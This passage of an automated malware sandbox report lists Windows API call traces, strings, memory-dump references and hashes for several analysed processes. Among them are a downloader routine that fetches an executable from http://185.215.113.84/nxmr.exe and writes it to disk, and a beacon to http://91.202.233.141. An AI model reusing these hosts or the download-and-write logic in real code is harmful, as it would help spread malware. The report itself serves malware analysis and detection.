                                                                                                                                                                                                        • Part of subcall function 004110B0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00411141
                                                                                                                                                                                                        • Part of subcall function 004110B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041116D
                                                                                                                                                                                                        • Part of subcall function 004110B0: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0041119C
                                                                                                                                                                                                        • Part of subcall function 004110B0: InternetReadFile.WININET(00000000,?,00000103,?), ref: 004111CF
                                                                                                                                                                                                        • Part of subcall function 004110B0: WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 00411200
                                                                                                                                                                                                        • Part of subcall function 004110B0: CloseHandle.KERNEL32(000000FF), ref: 0041120F
                                                                                                                                                                                                        • Part of subcall function 004110B0: wsprintfW.USER32 ref: 00411228
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • http://185.215.113.84/nxmr.exe, xrefs: 00411486
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001C.00000002.2053632789.0000000000411000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00410000, based on PE: true
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053588950.0000000000410000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053654739.0000000000412000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001C.00000002.2053676265.0000000000414000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_410000_28849683.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$wsprintf$EnvironmentExpandInternetStrings$ExistsOpenPathrand$CacheCloseCountCreateDeleteEntryHandleReadSleepTickWritesrand
                                                                                                                                                                                                      • String ID: http://185.215.113.84/nxmr.exe
                                                                                                                                                                                                      • API String ID: 4035879952-3066490085
                                                                                                                                                                                                      • Opcode ID: a8c237231297a56e8aa94e242a80dbba222c1b200f8fd9b5e2de3b69a5d2a6c2
                                                                                                                                                                                                      • Instruction ID: 90cfac1b962fa84b6b9d2c2a8463b81be7cb4c4da35f1b44636523ebf960546d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8c237231297a56e8aa94e242a80dbba222c1b200f8fd9b5e2de3b69a5d2a6c2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65D0A77590421D21B10173F37C077BF35A45D05B85F40543BBB46C89A3ED8CD4A490BE

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00011090 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 41fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 0 11090-110db ExpandEnvironmentStringsW wsprintfW 2 110e3-1110c 0->2 3 110dd-110df 0->3 6 1111b 2->6 7 1110e-11114 2->7 4 1111d-11120 3->4 6->4 7->6
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 000110AA
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 000110C3
                                                                                                                                                                                                      • PathFileExistsW.KERNELBASE(?), ref: 000110D3
                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 000110F9
                                                                                                                                                                                                      • CloseHandle.KERNELBASE(000000FF), ref: 00011115
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001D.00000002.2065678013.0000000000011000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065648494.0000000000010000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065701337.0000000000012000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065724643.0000000000013000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065743713.0000000000014000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065762069.0000000000015000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_29_2_10000_15714163.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                                      • String ID: %s\488888888888fs.txt$%temp%$@1Wu.Wu$^Iu
                                                                                                                                                                                                      • API String ID: 750032643-1908716496
                                                                                                                                                                                                      • Opcode ID: cd81d43bf780203170986fe64c488318e8dc8011eca48185fc7eb841c4e812f4
                                                                                                                                                                                                      • Instruction ID: caccfe26757f7b7f1ad24f677e2f170bec49738799e1f4306d511a82a7dc33dc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd81d43bf780203170986fe64c488318e8dc8011eca48185fc7eb841c4e812f4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD018FB494031CBBEB34DB609C4EFE97378AB48700F008694A715A60D2DAB49AD5CFA5
                                                                                                                                                                                                      Function 00011000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 40networksleepCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00011015
                                                                                                                                                                                                      • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0001102B
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00011056
                                                                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00011064
                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 0001106E
                                                                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00011079
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00011086
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • http://91.202.233.141/ALLBSTATAASASD, xrefs: 00011009
                                                                                                                                                                                                      • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 00011026
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001D.00000002.2065678013.0000000000011000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065648494.0000000000010000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065701337.0000000000012000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065724643.0000000000013000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065743713.0000000000014000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065762069.0000000000015000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_29_2_10000_15714163.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseHandleOpenSleep$wsprintf
                                                                                                                                                                                                      • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://91.202.233.141/ALLBSTATAASASD
                                                                                                                                                                                                      • API String ID: 2685051180-603325175
                                                                                                                                                                                                      • Opcode ID: 6efe71b386812069d558c841286644f468c337ccff1f395449052090cc4c6625
                                                                                                                                                                                                      • Instruction ID: 73fe5d0f45ee6e8785b11d71c71f3f339322512cb53ba410981e732c6069545a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6efe71b386812069d558c841286644f468c337ccff1f395449052090cc4c6625
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F012174E80305EBE7269F64DD0AFE97678EB0C701F104298B709A61D1C6746764CB65
                                                                                                                                                                                                      Function 00011130 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 11 11130-11148 Sleep call 11090 14 1114a call 11000 11->14 15 1114f-11152 11->15 14->15
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 00011138
                                                                                                                                                                                                        • Part of subcall function 00011090: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 000110AA
                                                                                                                                                                                                        • Part of subcall function 00011090: wsprintfW.USER32 ref: 000110C3
                                                                                                                                                                                                        • Part of subcall function 00011090: PathFileExistsW.KERNELBASE(?), ref: 000110D3
                                                                                                                                                                                                        • Part of subcall function 00011000: wsprintfW.USER32 ref: 00011015
                                                                                                                                                                                                        • Part of subcall function 00011000: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0001102B
                                                                                                                                                                                                        • Part of subcall function 00011000: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00011056
                                                                                                                                                                                                        • Part of subcall function 00011000: Sleep.KERNELBASE(000003E8), ref: 00011064
                                                                                                                                                                                                        • Part of subcall function 00011000: InternetCloseHandle.WININET(?), ref: 0001106E
                                                                                                                                                                                                        • Part of subcall function 00011000: Sleep.KERNELBASE(000003E8), ref: 00011079
                                                                                                                                                                                                        • Part of subcall function 00011000: InternetCloseHandle.WININET(00000000), ref: 00011086
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001D.00000002.2065678013.0000000000011000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065648494.0000000000010000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065701337.0000000000012000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065724643.0000000000013000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065743713.0000000000014000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001D.00000002.2065762069.0000000000015000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_29_2_10000_15714163.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$Sleep$CloseHandleOpenwsprintf$EnvironmentExistsExpandFilePathStrings
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 344363592-0
                                                                                                                                                                                                      • Opcode ID: 14e6a152ced4d09c9634f16486441e5e330de915639e0e0a7559dec3912d9d07
                                                                                                                                                                                                      • Instruction ID: 26a3b450e645d567a53b2c07ee1aa252fb490b847eec32e976f383b1746b0a8b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14e6a152ced4d09c9634f16486441e5e330de915639e0e0a7559dec3912d9d07
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAC08C3190424922A146B2B26C0F7E632DC4B087E2F004423B308C4483DE85D4D090B2

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00007FF68E1614B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001E.00000002.2169480174.00007FF68E161000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF68E160000, based on PE: true
                                                                                                                                                                                                      • Associated: 0000001E.00000002.2169449819.00007FF68E160000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001E.00000002.2169514578.00007FF68E17B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001E.00000002.2169540663.00007FF68E17C000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001E.00000002.2172172641.00007FF68E6E7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001E.00000002.2172228186.00007FF68E6E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001E.00000002.2172255203.00007FF68E6F2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001E.00000002.2172310053.00007FF68E6F5000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                      • Associated: 0000001E.00000002.2172664937.00007FF68E6F6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_30_2_7ff68e160000_1428024550.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                                      • Instruction ID: e5dc1ec6273d10626c4c5aec502ecadd024665123c3c2fdc2471f5ec641e5760
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09B01232A0964AE4E3002FE1DC4129836307F24740F514038E90C833A2CE7C5480C710

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00007FFB4ACB4943 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001F.00000002.2162751437.00007FFB4ACB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_31_2_7ffb4acb0000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: b474753a8a21e8c21ca67ee1250eaf93f5cc9331fa693394e3917db58348404d
                                                                                                                                                                                                      • Instruction ID: da55490f9a67b2fb417b633f9b67b0913f99150f9662ae582e4e7008e6cc58fa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b474753a8a21e8c21ca67ee1250eaf93f5cc9331fa693394e3917db58348404d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34512762A0CA464FE7D9EF2CEA5127477D9EF84220B2801FAC24DC75D3DE15EC858386
                                                                                                                                                                                                      Function 00007FFB4ABEA0E5 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001F.00000002.2162056075.00007FFB4ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABE0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_31_2_7ffb4abe0000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 5f2aba8e603b841c39aacf23f2ca325615529242a569e2a635453c6c0bfcf2bf
                                                                                                                                                                                                      • Instruction ID: 16949f7ba41d0666284e72153ec81afc45f63a33ad46e14e3178c54572d869c0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f2aba8e603b841c39aacf23f2ca325615529242a569e2a635453c6c0bfcf2bf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F31E57191CB4C4FDB58DF5CD84A6A97BE0FB59321F00426FE449C3252DB64A855CBC2
                                                                                                                                                                                                      Function 00007FFB4AACE380 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001F.00000002.2160763061.00007FFB4AACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AACD000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_31_2_7ffb4aacd000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 678169d03986889e163e90f6e44850187a70d2295eeb272bd36f498f024a65a5
                                                                                                                                                                                                      • Instruction ID: 808607b3481ec42a675279ddeff4126ce3a6a79f4f6b04bd9c30bfcbc860497f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 678169d03986889e163e90f6e44850187a70d2295eeb272bd36f498f024a65a5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C41E3B140DBC44FE7669F38D8459523FF4EF52224B1906EFD088CB1A3D625B846C7A2
                                                                                                                                                                                                      Function 00007FFB4ABEB028 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001F.00000002.2162056075.00007FFB4ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABE0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_31_2_7ffb4abe0000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 76c27b75f5185ad5ccab1cdb2524597c498c700f965907b21399a7f45dfd6738
                                                                                                                                                                                                      • Instruction ID: a93b81d08f1a09a1edd303bcd16b5f664127dc37b23bc561399f25522a3b7614
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76c27b75f5185ad5ccab1cdb2524597c498c700f965907b21399a7f45dfd6738
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC210A7190CB4C4FDB59DFACD84A7E97BE0EBA6321F04826BD448C3152D6746416CB91
                                                                                                                                                                                                      Function 00007FFB4ACB498F Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001F.00000002.2162751437.00007FFB4ACB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_31_2_7ffb4acb0000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 210ee376c72ed86277379327822501c28899a6006a798d2e9cf82de0399e47b8
                                                                                                                                                                                                      • Instruction ID: b5ef64397061b96e38141c972649a9f02cdb901603e71aebe89e306b146cca28
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 210ee376c72ed86277379327822501c28899a6006a798d2e9cf82de0399e47b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 562103A2E0DA474FE7E5EF28EA5117476D9EF40210B6900FAC25DC79D3CE19EC848346
                                                                                                                                                                                                      Function 00007FFB4ABE4675 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001F.00000002.2162056075.00007FFB4ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABE0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_31_2_7ffb4abe0000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                                                                                                                                                                      • Instruction ID: f6b5359b720160064ca2fd5b0154ce32e38fe0afe015b971b70262c3a95aa642
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6001677111CB0C8FD754EF0CE451AA6B7E0FB99364F10056EE58AC3651D636E892CB45
                                                                                                                                                                                                      Function 00007FFB4ABEAE76 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001F.00000002.2162056075.00007FFB4ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABE0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_31_2_7ffb4abe0000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 151f1949d9d0a8dcc28f54f6d7993c36144d4410b91a9e1a220c9fc4a8f5fe8a
                                                                                                                                                                                                      • Instruction ID: a4c8d98d3a84d29d00a1f350a064dd9b378d4de212d946aa0aec1acaac1a47e0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 151f1949d9d0a8dcc28f54f6d7993c36144d4410b91a9e1a220c9fc4a8f5fe8a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64F0F07680CB8C4FDB089F28A8164F57BE0FB55220B1582EFE44DC7522E722A8068BC1
                                                                                                                                                                                                      Function 00007FFB4ACB4CD0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001F.00000002.2162751437.00007FFB4ACB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_31_2_7ffb4acb0000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 08a1090f9d18791ea7cf9711408923d2e0c886174f48704d47d539e312c0534d
                                                                                                                                                                                                      • Instruction ID: f33c9a8cbe1747d9cb0ac66e13d487f53b082d5125f59832a57dbe7458f789f4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08a1090f9d18791ea7cf9711408923d2e0c886174f48704d47d539e312c0534d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07F0E272A0D5048FDB99EF6CE4414A877E4EF0532071100F6E24DCB5A3CA26EC84C755
                                                                                                                                                                                                      Function 00007FFB4ACB53E4 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001F.00000002.2162751437.00007FFB4ACB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_31_2_7ffb4acb0000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 90bd454a6d335b040b9f3e36ac7fecf5cdd0327bc19ba6fcc715715d3691a465
                                                                                                                                                                                                      • Instruction ID: 4317a8bbcab3077b64a75b482b31eb2c5e9ed5947f377325ba2fc9302d5fef93
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90bd454a6d335b040b9f3e36ac7fecf5cdd0327bc19ba6fcc715715d3691a465
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AF0A03131CF044FE748EE2DE44A6A2B3E1FBA8310F10462FE44AC3651DA21E8818782

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 00007FFB4ABE92FA Relevance: 6.5, Strings: 5, Instructions: 283COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000001F.00000002.2162056075.00007FFB4ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABE0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_31_2_7ffb4abe0000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: (CJ$0EJ$HCJ$XDJ$AJ
                                                                                                                                                                                                      • API String ID: 0-3342451538
                                                                                                                                                                                                      • Opcode ID: 7220bd9bf9646a62a9f54708f26f2adc639b06e6f51aaae898d76dba447883fb
                                                                                                                                                                                                      • Instruction ID: 8668656f76924bddf1fff8b4653b5e87a7b94b6416ddf4095f90c8c2f41807cb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7220bd9bf9646a62a9f54708f26f2adc639b06e6f51aaae898d76dba447883fb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0381C7CBA0EBD21BE3265EBCA9551E6AFA4FF5226472D01FBD0C48B5D7D809180B43D1

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00007FF6687E14B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000023.00000002.2358104984.00007FF6687E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6687E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000023.00000002.2357885927.00007FF6687E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000023.00000002.2362880423.00007FF668D69000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000023.00000002.2362974757.00007FF668D72000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000023.00000002.2363009707.00007FF668D75000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000023.00000002.2363073691.00007FF668D76000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_7ff6687e0000_winupsecvmgr.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                                      • Instruction ID: 9aa3de3286ac1145ae7ce0748afe46f02ab00d0d98de37c59cb037bf81a5ee16
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AB0123190A28DD4E7002F32D84229C36306F04741F404030C40C4F352CE7C50804735

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00007FF6E69985C0 Relevance: 55.0, APIs: 15, Strings: 21, Instructions: 1045COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
